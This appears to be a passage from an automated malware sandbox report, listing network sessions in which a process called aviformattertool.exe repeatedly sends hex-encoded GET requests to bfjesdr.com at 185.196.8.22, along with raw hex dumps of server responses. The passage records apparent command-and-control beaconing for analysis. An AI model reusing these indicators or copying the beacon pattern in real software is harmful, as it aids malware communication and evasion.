                                                                                                                                                        Data Ascii: f6467b69c953804b26b565fe95b321bd19a55fb90cde31701eaa65df401d7fa81e89487468649cde4de3d29af4ce0d1c71325e97753ac7cf379a83651defdda16c747c77cb510ff388d21fa12a260db52bae350ec537b49ef24679e3d6290fe11c8f1949a33d36e9116d2518f2abd5fb6f75e21e565d3f47ea78ee6dc40e53ec91d325a4422e7236c0966bcf28cfb8c2e51e6577a20f6345bffe2e588f22073a1e7419284fb712612b576e991d5b365d0750420306eaa57cedda6382fb2d708b01ebba63aa6c4cb327e2c0ed330e012efd9a0004ecc3d13c04bdcf4699b2db79655a3ebd9b6c83c3dbc79bdf30e99aabd735aab86fc24b3fc808501ee16fc58824566ceb5c1f6dc4c79a290f03fac6a810e3daa27d438d69605d55fb4361a1857d4d66e5f31516585f7872f3262490ecec1b70e12f8d0b2e8dd347f70ef369bc00615419ca9da07444ed77d75513549fdd5d1d2f2c95b823d6444ff7c348929beca8d7d8a5dde8e22020a699afd9dea1804a7278fc610770bc336caf58f0975367b9e3502e65d4e7b798e4bc4bda2f935a7dbc310528629ca5c578cb7c96cd04f3abe60e82c26b36f865103cda5baac6db9c90b984bd6dec04aae15a942fdacae679aae30ab2e3c0634c7837314edbfc8456ce9263d341618de24af47a5149b45c3a2ce8d49fb499786b7ca2e0ed2262ea19e5cc05519074ccc471559304803e4974d48a91430cef1b51ecce86db0e9e6fe1d2070d503c6ca0ba459e04a3d70b
                                                                                                                                                        Jan 13, 2024 06:32:53.732162952 CET1286INData Raw: 32 64 63 34 65 61 37 38 63 31 30 30 61 33 38 66 61 63 39 32 65 63 35 63 31 39 39 63 33 64 30 62 30 37 64 38 38 64 39 33 36 32 32 33 30 30 39 33 61 61 39 37 34 32 31 66 35 61 31 66 35 61 66 62 36 32 62 31 63 64 34 61 34 64 31 39 64 35 34 66 39 66
                                                                                                                                                        Data Ascii: 2dc4ea78c100a38fac92ec5c199c3d0b07d88d9362230093aa97421f5a1f5afb62b1cd4a4d19d54f9f1bf4f3901b4435af5be1c1ab49c4020fcabd5cee6c5afb2c155ae8bc4af56d3731e54c47cf9e727fbf830a5bbdb0aed4b6395c426c1392b967d5aacf1d7a138f757df8799ca01768b617cb31503d474df
                                                                                                                                                        Jan 13, 2024 06:32:53.732180119 CET1286INData Raw: 66 30 30 33 32 64 38 30 31 61 35 30 65 62 30 32 62 39 63 34 36 37 38 34 38 35 32 62 36 31 37 36 32 34 36 36 34 65 39 62 39 33 33 39 62 63 34 34 34 36 61 63 39 65 31 63 35 36 35 32 33 64 34 36 34 64 65 66 32 36 39 39 64 61 34 66 39 65 62 36 30 36
                                                                                                                                                        Data Ascii: f0032d801a50eb02b9c46784852b617624664e9b9339bc4446ac9e1c56523d464def2699da4f9eb606a7989c3cf0ad4d3b08ad2233a5db80cbb9e17e765ec4760e3b26db6125412c7315f4e6a18132db1bd1bdd7427067436282cc6321954ace1a47f0498ca03f599372252ded27a22a3fd7b9cd09c5f9342e7
                                                                                                                                                        Jan 13, 2024 06:32:53.732204914 CET285INData Raw: 36 38 64 37 35 39 30 61 62 39 33 33 30 63 36 65 37 63 37 36 61 33 39 62 37 35 31 34 35 35 36 38 62 37 33 37 38 31 34 38 61 62 63 36 38 64 38 61 63 64 65 66 62 31 31 31 32 34 61 32 33 64 64 37 65 64 61 31 37 66 31 34 36 63 64 35 62 64 38 32 61 39
                                                                                                                                                        Data Ascii: 68d7590ab9330c6e7c76a39b75145568b7378148abc68d8acdefb11124a23dd7eda17f146cd5bd82a9d2e9341743ddd3fefaf2c5fb856ca0cd59db834a59377899273415cccd2acc3e71be6a3d86d63a6ba5c4a8bc8ae6073904799087f7f957bb67569ba70041de48e5b4945f4de54244a511c531be9379cc6
                                                                                                                                                        Jan 13, 2024 06:32:53.732223988 CET272INData Raw: 31 30 34 0d 0a 32 36 37 64 36 35 33 35 36 30 30 30 62 37 64 63 65 33 34 32 34 37 36 65 32 30 65 35 62 33 34 64 33 32 66 33 35 30 31 39 30 30 65 34 31 32 36 37 35 39 66 34 30 62 66 32 65 64 37 39 37 66 39 39 65 38 32 35 39 31 33 37 38 37 32 65 30
                                                                                                                                                        Data Ascii: 104267d65356000b7dce342476e20e5b34d32f3501900e4126759f40bf2ed797f99e8259137872e04ee29d707334d1856043546a9813b316e4193255f0144efe1843f9bc646a4f8bd2e598396f0ab1a057b83c70baddbbdfbd4ccb549601b793a1fb800dec7f08ca4b2bfe1e5fa19faf50203e6329e6d6f8d


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        1192.168.2.449739185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:32:54.247020006 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:32:54.473670959 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:32:54 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        2192.168.2.449740185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:32:54.775568962 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:32:54.992610931 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:32:54 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20
                                                                                                                                                        Jan 13, 2024 06:32:55.106118917 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:32:55.331656933 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:32:55 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        3192.168.2.449741185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:32:55.636356115 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:32:55.852837086 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:32:55 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20
                                                                                                                                                        Jan 13, 2024 06:32:55.962891102 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:32:56.184292078 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:32:56 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20
                                                                                                                                                        Jan 13, 2024 06:32:56.291934967 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:32:56.509675980 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:32:56 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20
                                                                                                                                                        Jan 13, 2024 06:32:56.619421959 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:32:56.836061001 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:32:56 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20
                                                                                                                                                        Jan 13, 2024 06:32:56.947837114 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:32:57.171179056 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:32:57 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        4192.168.2.449742185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:32:57.480485916 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:32:57.697202921 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:32:57 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20
                                                                                                                                                        Jan 13, 2024 06:32:57.807179928 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:32:58.023518085 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:32:57 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20
                                                                                                                                                        Jan 13, 2024 06:32:58.135067940 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:32:58.361965895 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:32:58 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        5192.168.2.449743185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:32:58.666810989 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:32:58.883490086 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:32:58 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20
                                                                                                                                                        Jan 13, 2024 06:32:58.994115114 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:32:59.215150118 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:32:59 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        6192.168.2.449744185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:32:59.524748087 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:32:59.741477966 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:32:59 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20
                                                                                                                                                        Jan 13, 2024 06:32:59.853621006 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:00.070429087 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:32:59 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20
                                                                                                                                                        Jan 13, 2024 06:33:00.182375908 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:00.406045914 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:00 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        7192.168.2.449745185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:00.712280035 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:00.928683996 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:00 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20
                                                                                                                                                        Jan 13, 2024 06:33:01.041418076 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:01.263536930 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:01 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        8192.168.2.449746185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:01.574083090 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:01.791479111 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:01 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        9192.168.2.449747185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:02.104852915 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:02.326613903 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:02 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        10192.168.2.449748185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
